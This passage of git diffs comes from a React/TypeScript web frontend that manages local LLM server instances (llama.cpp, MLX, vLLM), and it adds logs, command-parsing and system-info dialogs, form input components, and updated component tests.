<p className="text-foreground text-lg mb-2">No instances found</p>
<p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div>
)
}
return (
<div className="space-y-4">
<h2 className="text-xl font-semibold text-gray-900 mb-6">
<h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length})
</h2>

View File

@@ -11,6 +11,7 @@ import {
DialogTitle,
} from '@/components/ui/dialog'
import { Badge } from '@/components/ui/badge'
import { instancesApi } from '@/lib/api'
import {
RefreshCw,
Download,
@@ -46,48 +47,44 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null)
// Fetch logs function
const fetchLogs = async (lines?: number) => {
if (!instanceName) return
setLoading(true)
setError(null)
try {
const params = lines ? `?lines=${lines}` : ''
const response = await fetch(`/api/v1/instances/${instanceName}/logs${params}`)
const fetchLogs = React.useCallback(
async (lines?: number) => {
if (!instanceName) return
if (!response.ok) {
throw new Error(`Failed to fetch logs: ${response.status}`)
setLoading(true)
setError(null)
try {
const logText = await instancesApi.getLogs(instanceName, lines)
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
const logText = await response.text()
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
}
},
[instanceName]
)
// Initial load when dialog opens
useEffect(() => {
if (open && instanceName) {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}
}, [open, instanceName])
}, [open, instanceName, fetchLogs, lineCount])
// Auto-refresh effect
useEffect(() => {
if (autoRefresh && isRunning && open) {
refreshIntervalRef.current = setInterval(() => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}, 2000) // Refresh every 2 seconds
} else {
if (refreshIntervalRef.current) {
@@ -101,7 +98,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
clearInterval(refreshIntervalRef.current)
}
}
}, [autoRefresh, isRunning, open, lineCount])
}, [autoRefresh, isRunning, open, lineCount, fetchLogs])
// Copy logs to clipboard
const copyLogs = async () => {
@@ -135,7 +132,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
// Apply new line count
const applyLineCount = () => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
setShowSettings(false)
}
@@ -198,7 +195,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<Button
variant="outline"
size="sm"
onClick={() => fetchLogs(lineCount)}
onClick={() => void fetchLogs(lineCount)}
disabled={loading}
>
{loading ? (
@@ -290,7 +287,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<div className="flex items-center gap-2 w-full">
<Button
variant="outline"
onClick={copyLogs}
onClick={() => void copyLogs()}
disabled={!logs}
>
{copied ? (

View File

@@ -0,0 +1,151 @@
import React, { useState } from "react";
import { Button } from "@/components/ui/button";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type BackendTypeValue, type CreateInstanceOptions } from "@/types/instance";
import { backendsApi } from "@/lib/api";
import { toast } from "sonner";
interface ParseCommandDialogProps {
open: boolean;
onOpenChange: (open: boolean) => void;
onParsed: (options: CreateInstanceOptions) => void;
backendType: BackendTypeValue;
}
const ParseCommandDialog: React.FC<ParseCommandDialogProps> = ({
open,
onOpenChange,
onParsed,
backendType,
}) => {
const [command, setCommand] = useState('');
const [loading, setLoading] = useState(false);
const [error, setError] = useState<string | null>(null);
const handleParse = async () => {
if (!command.trim()) {
setError("Command cannot be empty");
return;
}
setLoading(true);
setError(null);
try {
let options: CreateInstanceOptions;
// Parse based on selected backend type
switch (backendType) {
case BackendType.LLAMA_CPP:
options = await backendsApi.llamaCpp.parseCommand(command);
break;
case BackendType.MLX_LM:
options = await backendsApi.mlx.parseCommand(command);
break;
case BackendType.VLLM:
options = await backendsApi.vllm.parseCommand(command);
break;
default:
throw new Error(`Unsupported backend type: ${backendType}`);
}
onParsed(options);
onOpenChange(false);
setCommand('');
setError(null);
toast.success('Command parsed successfully');
} catch (err) {
const errorMessage = err instanceof Error ? err.message : 'Failed to parse command';
setError(errorMessage);
toast.error('Failed to parse command', {
description: errorMessage
});
} finally {
setLoading(false);
}
};
const handleOpenChange = (open: boolean) => {
if (!open) {
setCommand('');
setError(null);
}
onOpenChange(open);
};
const backendPlaceholders: Record<BackendTypeValue, string> = {
[BackendType.LLAMA_CPP]: "llama-server --model /path/to/model.gguf --gpu-layers 32 --ctx-size 4096",
[BackendType.MLX_LM]: "mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --host 0.0.0.0 --port 8080",
[BackendType.VLLM]: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2 --gpu-memory-utilization 0.9",
};
const getPlaceholderForBackend = (backendType: BackendTypeValue): string => {
return backendPlaceholders[backendType] || "Enter your command here...";
};
return (
<Dialog open={open} onOpenChange={handleOpenChange}>
<DialogContent className="sm:max-w-[600px]">
<DialogHeader>
<DialogTitle>Parse Backend Command</DialogTitle>
<DialogDescription>
Select your backend type and paste the command to automatically populate the form fields
</DialogDescription>
</DialogHeader>
<div className="space-y-4">
<div>
<Label className="text-sm font-medium">Backend Type:
<span className="font-normal text-muted-foreground">
{backendType === BackendType.LLAMA_CPP && 'Llama Server'}
{backendType === BackendType.MLX_LM && 'MLX LM'}
{backendType === BackendType.VLLM && 'vLLM'}
</span>
</Label>
</div>
<div>
<Label htmlFor="command">Command</Label>
<textarea
id="command"
value={command}
onChange={(e) => setCommand(e.target.value)}
placeholder={getPlaceholderForBackend(backendType)}
className="w-full h-32 p-3 mt-2 border border-input rounded-md font-mono text-sm resize-vertical focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2"
/>
</div>
{error && (
<div className="text-destructive text-sm bg-destructive/10 p-3 rounded-md">
{error}
</div>
)}
</div>
<DialogFooter>
<Button variant="outline" onClick={() => handleOpenChange(false)}>
Cancel
</Button>
<Button
onClick={() => {
handleParse().catch(console.error);
}}
disabled={!command.trim() || loading}
>
{loading ? 'Parsing...' : 'Parse Command'}
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
);
};
export default ParseCommandDialog;

View File

@@ -8,166 +8,257 @@ import {
DialogHeader,
DialogTitle,
} from '@/components/ui/dialog'
import {
RefreshCw,
import SelectInput from '@/components/form/SelectInput'
import {
RefreshCw,
AlertCircle,
Loader2,
ChevronDown,
ChevronRight,
Monitor,
HelpCircle
HelpCircle,
Info
} from 'lucide-react'
import { serverApi } from '@/lib/api'
import { BackendType, type BackendTypeValue } from '@/types/instance'
interface SystemInfoModalProps {
// Helper to get version from environment
const getAppVersion = (): string => {
try {
return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
} catch {
return 'unknown'
}
}
interface SystemInfoDialogProps {
open: boolean
onOpenChange: (open: boolean) => void
}
interface SystemInfo {
interface BackendInfo {
version: string
devices: string
help: string
}
const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
const BACKEND_OPTIONS = [
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' },
]
const SystemInfoDialog: React.FC<SystemInfoDialogProps> = ({
open,
onOpenChange
}) => {
const [systemInfo, setSystemInfo] = useState<SystemInfo | null>(null)
const [selectedBackend, setSelectedBackend] = useState<BackendTypeValue>(BackendType.LLAMA_CPP)
const [backendInfo, setBackendInfo] = useState<BackendInfo | null>(null)
const [loading, setLoading] = useState(false)
const [error, setError] = useState<string | null>(null)
const [showHelp, setShowHelp] = useState(false)
// Fetch system info
const fetchSystemInfo = async () => {
// Fetch backend info
const fetchBackendInfo = async (backend: BackendTypeValue) => {
if (backend !== BackendType.LLAMA_CPP) {
setBackendInfo(null)
setError(null)
return
}
setLoading(true)
setError(null)
try {
const [version, devices, help] = await Promise.all([
serverApi.getVersion(),
serverApi.getDevices(),
serverApi.getHelp()
])
setSystemInfo({ version, devices, help })
setBackendInfo({ version, devices, help })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch system info')
setError(err instanceof Error ? err.message : 'Failed to fetch backend info')
} finally {
setLoading(false)
}
}
// Load data when dialog opens
// Load data when dialog opens or backend changes
useEffect(() => {
if (open) {
fetchSystemInfo()
void fetchBackendInfo(selectedBackend)
}
}, [open])
}, [open, selectedBackend])
const handleBackendChange = (value: string) => {
setSelectedBackend(value as BackendTypeValue)
setShowHelp(false) // Reset help section when switching backends
}
const renderBackendSpecificContent = () => {
if (selectedBackend !== BackendType.LLAMA_CPP) {
return (
<div className="flex items-center justify-center py-8">
<div className="text-center space-y-3">
<Info className="h-8 w-8 text-gray-400 mx-auto" />
<div>
<h3 className="font-semibold text-gray-700">Backend Info Not Available</h3>
<p className="text-sm text-gray-500 mt-1">
Information for {BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} backend is not yet implemented.
</p>
</div>
</div>
</div>
)
}
if (loading && !backendInfo) {
return (
<div className="flex items-center justify-center py-8">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading backend information...</span>
</div>
)
}
if (error) {
return (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
)
}
if (!backendInfo) {
return null
}
return (
<div className="space-y-6">
{/* Backend Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">
{BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} Version
</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.version}
</pre>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{backendInfo.help}
</pre>
</div>
)}
</div>
</div>
)
}
return (
<Dialog open={open} onOpenChange={onOpenChange} >
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-4xl max-w-[calc(100%-2rem)] max-h-[80vh] flex flex-col">
<DialogHeader>
<div className="flex items-center justify-between">
<div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
Llama.cpp server environment and capabilities
</DialogDescription>
</div>
<Button
variant="outline"
size="sm"
onClick={fetchSystemInfo}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
</div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
View system and backend-specific environment and capabilities
</DialogDescription>
</DialogHeader>
<div className="flex-1 overflow-y-auto">
{loading && !systemInfo ? (
<div className="flex items-center justify-center py-12">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading system information...</span>
</div>
) : error ? (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
) : systemInfo ? (
<div className="space-y-6">
{/* Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{systemInfo.version}
</pre>
</div>
<div className="space-y-6">
{/* Llamactl Version Section - Always shown */}
<div className="space-y-3">
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
{/* Backend Selection Section */}
<div className="space-y-3">
<h3 className="font-semibold">Backend Information</h3>
<div className="flex items-center gap-3">
<div className="flex-1">
<SelectInput
id="backend-select"
label=""
value={selectedBackend}
onChange={(value) => handleBackendChange(value || BackendType.LLAMA_CPP)}
options={BACKEND_OPTIONS}
className="text-sm"
/>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{systemInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{systemInfo.help}
</pre>
</div>
{selectedBackend === BackendType.LLAMA_CPP && (
<Button
variant="outline"
size="sm"
onClick={() => void fetchBackendInfo(selectedBackend)}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
)}
</div>
</div>
) : null}
{/* Backend-specific content */}
{renderBackendSpecificContent()}
</div>
</div>
<DialogFooter>

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = {
name: 'test-instance',
running: false,
options: { model: 'test-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
}
const runningInstance: Instance = {
name: 'running-instance',
running: true,
options: { model: 'running-model.gguf' }
status: 'running',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
}
beforeEach(() => {
@@ -101,7 +102,7 @@ afterEach(() => {
it('opens logs dialog when logs button clicked', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -112,9 +113,13 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const logsButton = screen.getByTitle('View logs')
await user.click(logsButton)
// Should open logs dialog (we can verify this by checking if dialog title appears)
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
})
@@ -124,7 +129,7 @@ afterEach(() => {
it('shows confirmation dialog and calls deleteInstance when confirmed', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
render(
<InstanceCard
instance={stoppedInstance}
@@ -135,19 +140,23 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance"?')
expect(mockDeleteInstance).toHaveBeenCalledWith('test-instance')
confirmSpy.mockRestore()
})
it('does not call deleteInstance when confirmation cancelled', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
render(
<InstanceCard
instance={stoppedInstance}
@@ -158,18 +167,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalled()
expect(mockDeleteInstance).not.toHaveBeenCalled()
confirmSpy.mockRestore()
})
})
describe('Button State Based on Instance Status', () => {
it('disables start button and enables stop button for running instance', () => {
it('disables start button and enables stop button for running instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -180,12 +195,19 @@ afterEach(() => {
/>
)
expect(screen.getByTitle('Start instance')).toBeDisabled()
expect(screen.queryByTitle('Start instance')).not.toBeInTheDocument()
expect(screen.getByTitle('Stop instance')).not.toBeDisabled()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).toBeDisabled() // Can't delete running instance
})
it('enables start button and disables stop button for stopped instance', () => {
it('enables start button and disables stop button for stopped instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -197,11 +219,18 @@ afterEach(() => {
)
expect(screen.getByTitle('Start instance')).not.toBeDisabled()
expect(screen.getByTitle('Stop instance')).toBeDisabled()
expect(screen.queryByTitle('Stop instance')).not.toBeInTheDocument()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).not.toBeDisabled() // Can delete stopped instance
})
it('edit and logs buttons are always enabled', () => {
it('edit and logs buttons are always enabled', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -213,6 +242,11 @@ afterEach(() => {
)
expect(screen.getByTitle('Edit instance')).not.toBeDisabled()
// Expand more actions to access logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('View logs')).not.toBeDisabled()
})
})
@@ -267,7 +301,7 @@ afterEach(() => {
describe('Integration with LogsModal', () => {
it('passes correct props to LogsModal', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -278,20 +312,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
// Open logs dialog
await user.click(screen.getByTitle('View logs'))
// Verify dialog opened with correct instance data
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
// Close dialog to test close functionality
const closeButtons = screen.getAllByText('Close')
const dialogCloseButton = closeButtons.find(button =>
const dialogCloseButton = closeButtons.find(button =>
button.closest('[data-slot="dialog-content"]')
)
expect(dialogCloseButton).toBeTruthy()
await user.click(dialogCloseButton!)
// Modal should close
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
})
@@ -301,7 +339,7 @@ afterEach(() => {
it('handles instance with minimal data', () => {
const minimalInstance: Instance = {
name: 'minimal',
running: false,
status: 'stopped',
options: {}
}
@@ -323,7 +361,7 @@ afterEach(() => {
it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = {
name: 'no-options',
running: true,
status: 'running',
options: undefined
}

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [
{ name: 'instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'instance-2', running: true, options: { model: 'model2.gguf' } },
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
{ name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
]
const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => {
const mockInstance: Instance = {
name: 'existing-instance',
running: false,
status: 'stopped',
options: {
model: 'test-model.gguf',
gpu_layers: 10,
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
}
}
@@ -177,15 +179,15 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
model: 'test-model.gguf',
gpu_layers: 10,
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
})
})
it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, running: true }
const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render(
<InstanceDialog
open={true}
@@ -271,35 +273,13 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5,
restart_delay: 10
})
})
})
describe('Advanced Fields Toggle', () => {
it('shows advanced fields when toggle clicked', async () => {
const user = userEvent.setup()
render(
<InstanceDialog
open={true}
onOpenChange={mockOnOpenChange}
onSave={mockOnSave}
/>
)
// Advanced fields should be hidden initially
expect(screen.queryByText(/Advanced Configuration/)).toBeInTheDocument()
// Click to expand
await user.click(screen.getByText(/Advanced Configuration/))
// Should show more configuration options
// Note: Specific fields depend on zodFormUtils configuration
// We're testing the toggle behavior, not specific fields
})
})
describe('Form Data Handling', () => {
it('cleans up undefined values before submission', async () => {
@@ -321,6 +301,7 @@ afterEach(() => {
// Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
})
})
@@ -345,7 +326,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true,
gpu_layers: 15, // Should be number, not string
backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
})
})
})

View File

@@ -0,0 +1,62 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface ArrayInputProps {
id: string
label: string
value: string[] | undefined
onChange: (value: string[] | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const ArrayInput: React.FC<ArrayInputProps> = ({
id,
label,
value,
onChange,
placeholder = "item1, item2, item3",
description,
disabled = false,
className
}) => {
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const arrayValue = inputValue
.split(',')
.map(s => s.trim())
.filter(Boolean)
onChange(arrayValue.length > 0 ? arrayValue : undefined)
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
}
export default ArrayInput

View File

@@ -0,0 +1,42 @@
import React from 'react'
import { Checkbox } from '@/components/ui/checkbox'
import { Label } from '@/components/ui/label'
interface CheckboxInputProps {
id: string
label: string
value: boolean | undefined
onChange: (value: boolean) => void
description?: string
disabled?: boolean
className?: string
}
const CheckboxInput: React.FC<CheckboxInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
return (
<div className={`flex items-center space-x-2 ${className || ''}`}>
<Checkbox
id={id}
checked={value === true}
onCheckedChange={(checked) => onChange(!!checked)}
disabled={disabled}
/>
<Label htmlFor={id} className="text-sm font-normal">
{label}
{description && (
<span className="text-muted-foreground ml-1">- {description}</span>
)}
</Label>
</div>
)
}
export default CheckboxInput

View File

@@ -0,0 +1,144 @@
import React, { useState } from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Button } from '@/components/ui/button'
import { X, Plus } from 'lucide-react'
interface EnvironmentVariablesInputProps {
id: string
label: string
value: Record<string, string> | undefined
onChange: (value: Record<string, string> | undefined) => void
description?: string
disabled?: boolean
className?: string
}
interface EnvVar {
key: string
value: string
}
const EnvironmentVariablesInput: React.FC<EnvironmentVariablesInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
// Convert the value object to an array of key-value pairs for editing
const envVarsFromValue = value
? Object.entries(value).map(([key, val]) => ({ key, value: val }))
: []
const [envVars, setEnvVars] = useState<EnvVar[]>(
envVarsFromValue.length > 0 ? envVarsFromValue : [{ key: '', value: '' }]
)
// Update parent component when env vars change
const updateParent = (newEnvVars: EnvVar[]) => {
// Filter out empty entries
const validVars = newEnvVars.filter(env => env.key.trim() !== '' && env.value.trim() !== '')
if (validVars.length === 0) {
onChange(undefined)
} else {
const envObject = validVars.reduce((acc, env) => {
acc[env.key.trim()] = env.value.trim()
return acc
}, {} as Record<string, string>)
onChange(envObject)
}
}
const handleKeyChange = (index: number, newKey: string) => {
const newEnvVars = [...envVars]
newEnvVars[index].key = newKey
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const handleValueChange = (index: number, newValue: string) => {
const newEnvVars = [...envVars]
newEnvVars[index].value = newValue
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const addEnvVar = () => {
const newEnvVars = [...envVars, { key: '', value: '' }]
setEnvVars(newEnvVars)
}
const removeEnvVar = (index: number) => {
if (envVars.length === 1) {
// Reset to empty if it's the last one
const newEnvVars = [{ key: '', value: '' }]
setEnvVars(newEnvVars)
updateParent(newEnvVars)
} else {
const newEnvVars = envVars.filter((_, i) => i !== index)
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
}
return (
<div className={`grid gap-2 ${className || ''}`}>
<Label htmlFor={id}>
{label}
</Label>
<div className="space-y-2">
{envVars.map((envVar, index) => (
<div key={index} className="flex gap-2 items-center">
<Input
placeholder="Variable name"
value={envVar.key}
onChange={(e) => handleKeyChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Input
placeholder="Variable value"
value={envVar.value}
onChange={(e) => handleValueChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Button
type="button"
variant="outline"
size="sm"
onClick={() => removeEnvVar(index)}
disabled={disabled}
className="shrink-0"
>
<X className="h-4 w-4" />
</Button>
</div>
))}
<Button
type="button"
variant="outline"
size="sm"
onClick={addEnvVar}
disabled={disabled}
className="w-fit"
>
<Plus className="h-4 w-4 mr-2" />
Add Variable
</Button>
</div>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">
Environment variables that will be passed to the backend process
</p>
</div>
)
}
export default EnvironmentVariablesInput

View File

@@ -0,0 +1,60 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface NumberInputProps {
id: string
label: string
value: number | undefined
onChange: (value: number | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const NumberInput: React.FC<NumberInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const numValue = parseFloat(inputValue)
if (!isNaN(numValue)) {
onChange(numValue)
}
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="number"
step="any"
value={value !== undefined ? value : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default NumberInput

View File

@@ -0,0 +1,55 @@
import React from 'react'
import { Label } from '@/components/ui/label'
interface SelectOption {
value: string
label: string
}
interface SelectInputProps {
id: string
label: string
value: string | undefined
onChange: (value: string | undefined) => void
options: SelectOption[]
description?: string
disabled?: boolean
className?: string
}
const SelectInput: React.FC<SelectInputProps> = ({
id,
label,
value,
onChange,
options,
description,
disabled = false,
className
}) => {
return (
